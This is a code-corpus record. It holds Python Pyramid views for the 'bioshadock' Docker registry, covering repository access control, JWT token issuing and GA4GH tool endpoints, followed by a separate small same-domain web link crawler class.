if 'version' in repo['meta'] and version in repo['meta']['version']:
layers = repo['meta']['version'][version]['layers']
else:
return HTTPNotFound()
if version is None:
if 'layers' not in repo['meta'] or not repo['meta']['layers']:
return HTTPNotFound()
else:
layers = repo['meta']['layers']
return image_vulnerabilities.get_layers_vulnerabilities(layers)
@view_config(route_name='container', renderer='json', request_method='GET')
def container(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
if user and (is_admin(user['id'], request) or repo['user'] == user['id'] or user['id'] in repo['acl_push']['members']):
repo['user_can_push'] = True
else:
repo['user_can_push'] = False
return repo
@view_config(route_name='containers_new', renderer='json', request_method='POST')
def containers_new(request):
user = is_logged(request)
if user is None:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
if 'git' not in form or not form['git']:
form['git'] = None
repo_id = form['name']
repo_name = repo_id.split('/')
if len(repo_name) == 1:
return HTTPForbidden("Invalid repository name, must match X/Y")
if user_can_push(user['id'], repo_id, request):
request.registry.db_mongo['repository'].update({'id': repo_id},
{'$set': {'meta.short_description': form['description'],
'meta.description': '',
'meta.Dockerfile': form['dockerfile'],
'meta.git': form['git'],
'meta.cwl_path': None,
'visible': form['visible'] in ['true', 1]}
})
build = request.registry.db_mongo['builds'].insert({'id': repo_id,
'progress': 'waiting'})
newbuild = {
'id': repo_id,
'build': str(build),
'date': datetime.datetime.now(),
'dockerfile': form['dockerfile'],
'git': form['git'],
'user': user['id'],
'cwl_path': None
}
build_container(request, newbuild)
# request.registry.db_redis.rpush('bioshadock:builds', dumps(newbuild))
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
es_repo = copy.deepcopy(repo)
del es_repo['_id']
del es_repo['builds']
res = request.registry.es.index(index="bioshadock", doc_type='container', id=repo_id, body=es_repo)
return repo
else:
return HTTPForbidden()
@view_config(route_name='containers_search', renderer='json', request_method='POST')
def containers_search(request):
form = json.loads(request.body, encoding=request.charset)
search = form['search']
user = is_logged(request)
regx = re.compile(search, re.IGNORECASE)
if user is None:
repos = request.registry.db_mongo['repository'].find({'visible': True, 'id': regx})
else:
repos = request.registry.db_mongo['repository'].find({'$or': [{'visible': True}, {'user': user['id']}, {'acl_pull.members': user['id']}], 'id': regx})
user_repos = []
for repo in repos:
user_repos.append(repo)
return user_repos
@view_config(route_name='api_repositories_images_layer_access', renderer='json', request_method='GET')
def api_repositories_images_layer_access(request):
'''
Library repo
/v1/repositories/{namespace}/{image}/layer/{id}/access
'''
#print str(request)
repo_id = str(request.matchdict['namespace'])+'/'+str(request.matchdict['image'])
secret = request.registry.config['registry']['secret_passphrase']
token = None
if request.authorization:
(type, bearer) = request.authorization
token = bearer.split(',')[0].replace('signature=','')
try:
msg = jwt.decode(token, secret)
except Exception as e:
print(str(e))
return HTTPForbidden(str(e))
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
return {'access':True}
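# The "signature=<jwt>,repository=...,access=..." bearer format parsed above is the docker_token
# string produced by the v1 push/pull/delete handlers below (e.g. api_library_push,
# api_repositories_push).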
@view_config(route_name='api_library', renderer='json', request_method='DELETE')
def api_library_delete(request):
repo_id = None
repo_id = 'library/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request) or not user_can_delete(username, repo_id, request):
return HTTPForbidden()
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return Response()
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'delete',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600*24)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=write"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.registry.db_mongo['repository'].remove({'id': repo_id})
request.response.headerlist.extend(headers)
return Response('Accepted', status_code=202, headerlist=request.response.headerlist)
@view_config(route_name='api_library', renderer='json', request_method='PUT')
def api_library_push(request):
'''
Library repo
/v1/repositories/{image}
'''
images = json.loads(request.body, encoding=request.charset)
repo_id = None
repo_id = 'library/'+ request.matchdict['image']
endpoints = request.registry.config['docker']['registry']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request) or not user_can_push(username, repo_id, request):
return HTTPForbidden()
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
request.registry.db_mongo['repository'].update({'id': repo_id}, {"$set":{'images': images}})
(type, bearer) = request.authorization
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'write',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=write"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.response.headerlist.extend(headers)
return Response('Created', headerlist=request.response.headerlist)
@view_config(route_name='api_library_images', renderer='json', request_method='GET')
def api_library_images(request):
'''
Library repo
/v1/repositories/{image}/images
'''
#images = json.loads(request.body, encoding=request.charset)
repo_id = 'library/' + request.matchdict['image']
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return HTTPNotFound()
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password = None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request):
return HTTPForbidden()
(type, bearer) = request.authorization
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'read',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=read"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.registry.db_mongo['repository'].update({'id': repo_id},{"$inc": { "pulls": 1}})
request.response.headerlist.extend(headers)
return Response(json.dumps(existing_repo['images']), headerlist=request.response.headerlist)
@view_config(route_name='api_library_images', renderer='json', request_method='PUT')
def api_library_images_push(request):
images = json.loads(request.body, encoding=request.charset)
repo_id = None
repo_id = 'library/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password = None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request):
return HTTPForbidden()
if images:
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return HTTPNotFound()
return {"access": True}
else:
return Response('',status_code=204)
@view_config(route_name='api_library_auth', renderer='json', request_method='PUT')
def api_library_auth(request):
'''
Library repo
/v1/repositories/{image}/auth
'''
repo_id = 'library/'+str(request.matchdict['image'])
secret = request.registry.config['registry']['secret_passphrase']
token = None
if request.authorization:
(type, bearer) = request.authorization
token = bearer.split(',')[0].replace('signature=','')
try:
msg = jwt.decode(token, secret)
if msg['acl'] == 'delete':
return Response('')
else:
return HTTPForbidden()
except Exception as e:
print(str(e))
return HTTPForbidden(str(e))
else:
return HTTPForbidden()
@view_config(route_name='api_repositories_images_get', renderer='json', request_method='GET')
def api_repositories_images(request):
'''
Library repo
/v1/repositories/{namespace}/{image}/images
'''
repo_id = str(request.matchdict['namespace'])+'/'+str(request.matchdict['image'])
secret = request.registry.config['registry']['secret_passphrase']
token = None
if request.authorization:
(type, bearer) = request.authorization
token = bearer.split(',')[0].replace('signature=','')
try:
msg = jwt.decode(token, secret)
except Exception as e:
print(str(e))
return HTTPForbidden(str(e))
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
images = []
for image in repo['images']:
images.append(image)
return images
@view_config(route_name='api_repositories_images_put', renderer='json', request_method='PUT')
def api_repositories_images_push(request):
'''
Library repo
/v1/repositories/{namespace}/{image}/images
'''
images = json.loads(request.body, encoding=request.charset)
repo_id = None
repo_id = request.matchdict['namespace'] + '/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password = None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request):
return HTTPForbidden()
if images:
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return HTTPNotFound()
return {"access": True}
else:
return Response('',status_code=204)
@view_config(route_name='api_repositories', renderer='json', request_method='DELETE')
def api_repositories_delete(request):
repo_id = None
repo_id = request.matchdict['namespace'] + '/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password = None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request) or not user_can_delete(username, repo_id, request):
return HTTPForbidden()
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return Response('')
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'delete',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=write"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.registry.db_mongo['repository'].remove({'id': repo_id})
request.response.headerlist.extend(headers)
return Response('Accepted', status_code=202, headerlist=request.response.headerlist)
@view_config(route_name='api_repositories_auth', renderer='json', request_method='PUT')
def api_repositories_auth(request):
'''
Library repo
/v1/repositories/{image}/auth
'''
repo_id = request.matchdict['namespace'] + '/'+str(request.matchdict['image'])
secret = request.registry.config['registry']['secret_passphrase']
token = None
if request.authorization:
(type, bearer) = request.authorization
token = bearer.split(',')[0].replace('signature=','')
try:
msg = jwt.decode(token, secret)
if msg['acl'] == 'delete':
return Response('')
else:
return HTTPForbidden()
except Exception as e:
print str(e)
return HTTPForbidden(str(e))
else:
return HTTPForbidden()
@view_config(route_name='api_repositories', renderer='json', request_method='PUT')
def api_repositories_push(request):
'''
Library repo
/v1/repositories/{namespace}/{image}
'''
images = json.loads(request.body, encoding=request.charset)
repo_id = None
repo_id = request.matchdict['namespace'] + '/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password = None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request) or not user_can_push(username, repo_id, request):
return HTTPForbidden()
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
request.registry.db_mongo['repository'].update({'id': repo_id}, {"$set":{'images': images}})
(type, bearer) = request.authorization
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'write',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=write"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.response.headerlist.extend(headers)
return Response('Created', headerlist=request.response.headerlist)
@view_config(route_name='api_other', renderer='json')
def api_other(request):
print "#Other v1 Route: "+str(request.matchdict['api'])
print str(request)
return HTTPForbidden()
@view_config(route_name='api2_other', renderer='json')
def api2_other(request):
print "#Other v2 Route: "+str(request.matchdict['api'])
print str(request)
return Response('OK')
@view_config(route_name='api_ping', renderer='json')
def api_ping(request):
print str('ping')
headers = [("X-Docker-Registry-Config", "local"),
("X-Docker-Registry-Standalone", "false")
]
request.response.headerlist.extend(headers)
return Response('OK', headerlist=request.response.headerlist)
@view_config(route_name='api2_ping', renderer='json')
def api2_ping(request):
print str('ping')
headers = [("X-Docker-Registry-Config", "local"),
("X-Docker-Registry-Standalone", "false")
]
request.response.headerlist.extend(headers)
return Response('OK', headerlist=request.response.headerlist)
def to_bytes(n, length):
return bytes( (n >> i*8) & 0xff for i in reversed(range(length)))
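# Example (Python 3 semantics, where bytes() accepts an iterable of ints):
# to_bytes(1025, 2) -> b'\x04\x01', i.e. a fixed-length big-endian encoding.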
def user_can_delete(username, repository, request):
user_repo = repository
repos = repository.split('/')
#if len(repos) == 1:
# user_repo = 'library/'+repository
existing_repo = request.registry.db_mongo['repository'].find_one({'id': user_repo})
if existing_repo is not None:
if existing_repo['user'] == username or is_admin(username, request):
return True
else:
return False
else:
return False
def user_can_push(username, repository, request):
if username == 'anonymous':
return False
user_repo = repository
is_library = False
repos = repository.split('/')
if len(repos) == 1:
return False
if repos[0] == 'library':
if not can_push_to_library(username, request):
return False
#user_repo = 'library/'+repository
is_library = True
existing_repo = request.registry.db_mongo['repository'].find_one({'id': user_repo})
if existing_repo is not None:
if existing_repo['user'] == username or username in existing_repo['acl_push']['members'] or username in request.registry.admin:
return True
else:
return False
else:
user_db = request.registry.db_mongo['users'].find_one({'id': username})
if user_db is None:
return False
else:
# Contributors can push only if it is enabled in the configuration
if user_db['role'] == 'contributor' and request.registry.config['general']['contributor_can_push'] != 1:
return False
# Visitors cannot push
if user_db['role'] == 'visitor':
return False
if not is_library or (is_library and can_push_to_library(username, request)):
repo = { 'id' : user_repo,
'user': username,
'pulls': 0,
'visible': True,
'library': is_library,
'meta': {
'tags': [],
'terms': [],
'description': None,
'Dockerfile': None
},
'acl_push': { 'members': [], 'groups': [] },
'acl_pull': { 'members': [], 'groups': [] },
'builds': []
}
request.registry.db_mongo['repository'].insert(repo)
notify_new_container_email(request, repo)
es_repo = copy.deepcopy(repo)
del es_repo['_id']
del es_repo['builds']
res = request.registry.es.index(index="bioshadock", doc_type='container', id=user_repo, body=es_repo)
return True
else:
return False
def user_can_pull(username, repository, request):
user_repo = repository
repos = repository.split('/')
#if len(repos) == 1:
# user_repo = 'library/'+repository
existing_repo = request.registry.db_mongo['repository'].find_one({'id': user_repo})
if existing_repo is not None:
if existing_repo['user'] == username or username in existing_repo['acl_pull']['members'] or username in request.registry.admin:
return True
else:
if existing_repo['visible']:
return True
else:
return False
else:
return False
@view_config(route_name='api2_token', renderer='json')
def api2_token(request):
account = None
try:
account = request.params['account']
except Exception:
pass
service = request.params['service']
scopes = None
try:
#scope = request.params['scope']
scopes = request.GET.getall('scope')
except Exception:
pass
if request.authorization or request.authorization is None:
# Login request
if request.authorization is None:
account = 'anonymous'
if account != 'anonymous' and not is_logged(request):
(bearer_type, bearer) = request.authorization
username, password = decode(bearer)
if username == 'anonymous':
username = account
elif not valid_user(username, password, request):
logging.error("User authentication failure")
return HTTPForbidden()
else:
username = account
secret = None
private_key = None
passphrase = None
if request.registry.config['certs']['private_key_passphrase']:
passphrase = request.registry.config['certs']['private_key_passphrase']
with open(request.registry.config['certs']['private_key'], 'r') as content_file:
private_key = load_pem_private_key(content_file.read().encode('utf-8'),
password=passphrase, backend=default_backend())
pub_key = None
pem = None
exponent = None
modulus = None
with open(request.registry.config['certs']['public_key'], 'r') as content_file:
pub_key = content_file.read().encode('utf-8')
pub_key = load_pem_x509_certificate(pub_key, backend=default_backend())
pub_key = pub_key.public_key()
pem = pub_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
pub_numbers = pub_key.public_numbers()
exponent = pub_numbers._e
modulus= pub_numbers._n
modulus = ('%%0%dx' % (256 << 1) % modulus).decode('hex')[-256:]
exponent = ('%%0%dx' % (3 << 1) % exponent).decode('hex')[-3:]
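# The two lines above render the RSA modulus and exponent integers as
# fixed-length big-endian byte strings (256 bytes and 3 bytes respectively)
# via Python 2's str.decode('hex'); they are base64url-encoded into the
# JWT 'jwk' header further below.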
der = None
with open(request.registry.config['certs']['cacert_der'], 'rb') as content_file:
der = content_file.read()
access = []
if scopes is not None:
access = []
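# Each requested scope is expected to follow the Docker registry token
# format 'type:name:actions', e.g. 'repository:library/ubuntu:pull,push'
# (the image name here is purely illustrative).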
for scope in scopes:
scope = scope.split(':')
repo_type = scope[0]
repository = scope[1]
actions = scope[2].split(',')
allowed_actions = []
for action in actions:
if action == 'push' and user_can_push(username, repository, request):
allowed_actions.append(action)
if action == 'pull' and user_can_pull(username, repository, request):
allowed_actions.append(action)
request.registry.db_mongo['repository'].update({'id': repository},{"$inc": { "pulls": 1}})
if action == 'manifest' and user_can_pull(username, repository, request):
allowed_actions.append('pull')
access.append({
"type": repo_type,
"name": repository,
"actions": allowed_actions
})
claims = {'iss': request.registry.config['registry']['issuer'],
'sub': username,
'aud': service,
'access': access,
#'nbf': datetime.datetime.utcnow(),
'iat': datetime.datetime.utcnow(),
'exp': datetime.datetime.utcnow()+datetime.timedelta(seconds=3600*24),
}
token = jwt.encode(claims,
private_key, algorithm='RS256',
headers={'jwk': {'kty': 'RSA', 'alg': 'RS256',
'n': base64.urlsafe_b64encode(modulus),
'e': base64.urlsafe_b64encode(exponent),
'x5c': [base64.b64encode(der)]
}}
)
return {'token': token}
return HTTPForbidden()
@view_config(route_name='api_users', renderer='json')
def api_users(request):
user = json.loads(request.body, encoding=request.charset)
user_id = None
existing_user = request.registry.db_mongo['users'].find_one({'id': user_id})
if not existing_user:
return HTTPForbidden("You must register first")
return Response("User Created", status_code=201)
@view_config(route_name='ga4gh_tools_query', renderer='json', request_method='GET')
def ga4gh_tools_query(request):
return HTTPNotFound()
@view_config(route_name='ga4gh_tool_descriptor', renderer='json', request_method='GET')
def ga4gh_tool_descriptor(request):
if 'format' in request.params and request.params['format'].lower() != 'cwl':
return HTTPNotFound()
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if repo is None:
return HTTPNotFound()
if 'cwl' not in repo['meta'] or not repo['meta']['cwl']:
return HTTPNotFound()
return { 'descriptor': repo['meta']['cwl'] }
@view_config(route_name='ga4gh_tool_dockerfile', renderer='json', request_method='GET')
def ga4gh_tool_dockerfile(request):
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if repo is None:
return HTTPNotFound()
if 'Dockerfile' not in repo['meta'] or not repo['meta']['Dockerfile']:
return HTTPNotFound()
return { 'dockerfile': repo['meta']['Dockerfile'] }
'''
config.add_route('ga4gh_tools', '/api/ga4gh/v1/tools')
config.add_route('ga4gh_tools_id', '/api/ga4gh/v1/tools/{id}')
config.add_route('ga4gh_tools_id_versions', '/api/ga4gh/v1/tools/{id}/versions')
config.add_route('ga4gh_tools_id_version', '/api/ga4gh/v1/tools/{id}/versions/{versionid}')
config.add_route('ga4gh_tools_id_version_descriptor', '/api/ga4gh/v1/tools/{id}/versions/{versionid}/{type}/descriptor')
config.add_route('ga4gh_tools_id_version_descriptor_file_relative_path', '/api/ga4gh/v1/tools/{id}/versions/{versionid}/{type}/descriptor/{relativepath}')
config.add_route('ga4gh_tools_id_version_dockerfile', '/api/ga4gh/v1/tools/{id}/versions/{versionid}/dockerfile')
config.add_route('ga4gh_metadata', '/api/ga4gh/v1/metadata')
config.add_route('ga4gh_tool_classes', '/api/ga4gh/v1/tool-classes')
'''
@view_config(route_name='ga4gh_metadata', renderer='json', request_method='GET')
def ga4gh_metadata(request):
return {
'version': '1.0',
'api-version': '1.0',
'country': 'FRA',
'friendly-name': 'bioshadock'
}
@view_config(route_name='ga4gh_tools_id', renderer='json', request_method='GET')
def ga4gh_tools_id(request):
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPNotFound()
repo_versions = request.registry.db_mongo['versions'].find({'repo': repo['id']})
if not repo_versions:
return HTTPNotFound()
toolname = repo['id'].split('/')[-1:][0]
tool = {
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'id': str(repo['_id'])+'@'+request.registry.config['registry']['service'],
'organization': request.registry.config['registry']['service'],
'toolname': toolname,
'tooltype': {},
'description': repo['meta']['description'],
'author': repo['user'],
'meta-version': 'latest',
'versions': []
}
# Versions
versions = []
# Versions
for repo_version in repo_versions:
version = {
'id': repo_version['version'],
'name': repo_version['version'],
'meta-version': 'latest',
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'image': request.registry.config['registry']['service'] + '/' + repo['id'] + ':' + repo_version['version'],
'descriptor-type': [],
'dockerfile': False
}
if repo_version['cwl']:
version['descriptor-type'] = ['CWL']
if repo_version['dockerfile']:
version['dockerfile'] = {'dockerfile': True}
versions.append(version)
tool['versions'] = versions
return tool
@view_config(route_name='ga4gh_tools_id_versions', renderer='json', request_method='GET')
def ga4gh_tools_id_versions(request):
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPNotFound()
repo_versions = request.registry.db_mongo['versions'].find({'repo': repo['id']})
if not repo_versions:
return HTTPNotFound()
versions = []
# Versions
for repo_version in repo_versions:
version = {
'id': repo_version['version'],
'name': repo_version['version'],
'meta-version': 'latest',
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'image': request.registry.config['registry']['service'] + '/' + repo['id'] + ':' + repo_version['version'],
'descriptor-type': [],
'dockerfile': False
}
if repo_version['cwl']:
version['descriptor-type'] = ['CWL']
if repo_version['dockerfile']:
version['dockerfile'] = {'dockerfile': True}
versions.append(version)
return versions
@view_config(route_name='ga4gh_tools_id_version', renderer='json', request_method='GET')
def ga4gh_tools_id_version(request):
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo_version_id = request.matchdict['versionid']
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPNotFound()
repo_version = request.registry.db_mongo['versions'].find_one({'repo': repo['id'], 'version': repo_version_id})
if not repo_version:
return HTTPNotFound()
version = {
'id': repo_version['version'],
'name': repo_version['version'],
'meta-version': 'latest',
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'image': request.registry.config['registry']['service'] + '/' + repo['id'] + ':' + repo_version['version'],
'descriptor-type': [],
'dockerfile': False
}
if repo_version['cwl']:
version['descriptor-type'] = ['CWL']
if repo_version['dockerfile']:
version['dockerfile'] = {'dockerfile': True}
return version
@view_config(route_name='ga4gh_tools_id_version_descriptor', renderer='json', request_method='GET')
def ga4gh_tools_id_version_descriptor(request):
if request.matchdict['type'] not in ['CWL', 'plain-CWL']:
return HTTPNotFound()
repo_id = request.matchdict['id']
repo_version = request.matchdict['versionid']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPForbidden()
repo_version = request.registry.db_mongo['versions'].find_one({'repo': repo['id'], 'version': repo_version})
if not repo_version:
return HTTPNotFound()
if not repo_version['cwl']:
return HTTPNotFound()
return { 'type': 'CWL', 'descriptor': repo_version['cwl'] }
@view_config(route_name='ga4gh_tools_id_version_descriptor_file_relative_path', renderer='json', request_method='GET')
def ga4gh_tools_id_version_descriptor_file_relative_path(request):
return HTTPNotFound()
@view_config(route_name='ga4gh_tools_id_version_dockerfile', renderer='json', request_method='GET')
def ga4gh_tools_id_version_dockerfile(request):
repo_id = request.matchdict['id']
repo_version = request.matchdict['versionid']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPNotFound()
repo_version = request.registry.db_mongo['versions'].find_one({'repo': repo['id'], 'version': repo_version})
if not repo_version:
return HTTPNotFound()
if not repo_version['dockerfile']:
return HTTPNotFound()
return { 'dockerfile': repo_version['dockerfile'] }
@view_config(route_name='ga4gh_tool_classes', renderer='json', request_method='GET')
def ga4gh_tool_classes(request):
return HTTPNotFound()
@view_config(route_name='ga4gh_tools', renderer='json', request_method='GET')
def ga4gh_tools(request):
repos = request.registry.db_mongo['repository'].find({'visible': True})
tools = []
offset= 0
if 'offset' in request.params:
offset = int(request.params['offset'])
limit = -1
if 'limit' in request.params:
limit = int(request.params['limit'])
index = 0
for repo in repos:
toolname = repo['id'].split('/')[-1:][0]
if 'cwl' not in repo['meta']:
repo['meta']['cwl'] = None
if 'id' in request.params:
if request.params['id'] != str(repo['_id'])+'@'+request.registry.config['registry']['service']:
continue
if 'registry' in request.params:
if request.params['registry'] != request.registry.config['registry']['service']:
return []
if 'organization' in request.params:
if request.params['organization'] != request.registry.config['registry']['service']:
return []
if 'name' in request.params:
if request.params['name'] != repo['id']:
continue
if 'toolname' in request.params:
if request.params['toolname'] != toolname and request.params['toolname'] not in repo['meta']['tags']:
continue
if 'description' in request.params:
if request.params['description'] not in repo['meta']['description']:
continue
if 'author' in request.params:
if request.params['author'] != repo['user']:
continue
tool = {
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'id': str(repo['_id'])+'@'+request.registry.config['registry']['service'],
'organization': request.registry.config['registry']['service'],
'toolname': toolname,
'tooltype': {},
'description': repo['meta']['description'],
'author': repo['user'],
'meta-version': 'latest',
'versions': []
}
# Versions
if 'docker_tags' in repo['meta']:
for docker_tag in repo['meta']['docker_tags']:
if 'tag' not in repo['meta']['docker_tags'][docker_tag]:
repo['meta']['docker_tags'][docker_tag]['tag'] = 'latest'
version = {
'id': repo['meta']['docker_tags'][docker_tag]['tag'],
'name': repo['meta']['docker_tags'][docker_tag]['tag'],
'meta-version': 'latest',
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'image': request.registry.config['registry']['service'] + '/' + repo['id'] + ':' + repo['meta']['docker_tags'][docker_tag]['tag'],
'descriptor-type': [],
'dockerfile': False
}
#repo_version = request.registry.db_mongo['versions'].find_one({'repo': repo['id'], 'version': repo['meta']['docker_tags'][docker_tag]['tag']})
if 'cwl_path' in repo['meta'] and repo['meta']['cwl_path']:
version['descriptor-type'] = ['CWL']
if repo['meta']['Dockerfile']:
version['dockerfile'] = {'dockerfile': True}
tool['versions'].append(version)
if limit == -1 or index < limit:
if index >= offset and tool['versions']:
tools.append(tool)
index += 1
if limit >= 0 and index >= limit:
break
return tools
@view_config(route_name='home', renderer='json')
def my_view(request):
if 'BIOSHADOCK_INSECURE' in os.environ:
return HTTPFound(request.static_path('shadock:webapp/'+request.registry.runenv+'/'))
if request.scheme == "http":
return HTTPFound("https://" + request.host + "/" + request.static_path('shadock:webapp/'+request.registry.runenv+'/'))
return HTTPFound(request.static_path('shadock:webapp/'+request.registry.runenv+'/'))
@view_config(
context='velruse.AuthenticationComplete',
)
def login_complete_view(request):
context = request.context
user_id = None
if context.profile['preferredUsername']:
user_id = context.profile['preferredUsername']
else:
user_id = context.profile['accounts'][0]['username']
result = {
'id': user_id,
'provider_type': context.provider_type,
'provider_name': context.provider_name,
'profile': context.profile,
'credentials': context.credentials,
}
secret = request.registry.config['registry']['secret_passphrase']
token = jwt.encode({'user': result,
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=36000),
'aud': 'urn:bioshadock/auth'}, secret)
return HTTPFound(request.static_url('shadock:webapp/dist/')+"index.html#login?token="+token)
``` |
{
"source": "Jibinjohnkj/crawler",
"score": 3
} |
#### File: crawler/spider/utils.py
```python
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse, urljoin
class Crawler:
max_links = 25
def __init__(self, url, max_depth=1):
self.max_depth = max_depth
self.url = url
self.pages_to_visit = []
def get_links(self):
# If max_links reached return
duplicate, limit_reached = self.check_if_duplicate_and_add(self.url)
if limit_reached:
return self.pages_to_visit
self.links_spider(self.url, 1)
return self.pages_to_visit
def links_spider(self, url, current_depth):
"""
Recursively parse all links until max_depth is reached
"""
# Exit if max_depth reached
if current_depth >= self.max_depth:
return
response = requests.head(url)
# Ignore non html content
if response.headers.get('Content-Type', '').split(';')[0] == 'text/html':
# Two loops for the same thing
# This is a conscious choice. As we want the spider to crawl only if max_links not reached and
# also avoid crawling duplicate links
links = []
for link in self.parse_links(url):
# Add to self.pages_to_visit, if max_links reached return
duplicate, limit_reached = self.check_if_duplicate_and_add(link)
if limit_reached:
return
if not duplicate:
links.append(link)
for link in links:
self.links_spider(link, current_depth + 1)
def parse_links(self, url):
"""
Given a url retrieve all links
"""
scheme, host = urlparse(self.url)[:2]
response = requests.get(url)
s = BeautifulSoup(response.text, "html.parser")
# Get all links
for link in s.findAll('a'):
href = link.get('href')
if href:
# If links starts with '//', add scheme
if href.startswith('//'):
href = scheme + ':' + href
# If links starts with '/', its in the same domain, so just add scheme and host
if href.startswith('/'):
yield scheme + '://' + host + href
else:
# Check if links are of the same domain
href_host = urlparse(href)[1]
if href_host == host:
yield href
def check_if_duplicate_and_add(self, url):
"""
Given a url, Check if duplicate, if not add to self.pages_to_visit. Also check if max_links reached
"""
duplicate = False
for item in self.pages_to_visit:
# Check if the url already exist in self.pages_to_visit after stripping unnecessary bits
if self.__class__.process_url(url) == self.__class__.process_url(item):
duplicate = True
if duplicate:
return True, False,
else:
# Safety precaution against timeout
if len(self.pages_to_visit) < self.max_links:
self.pages_to_visit.append(url)
return False, False,
else:
return False, True,
@staticmethod
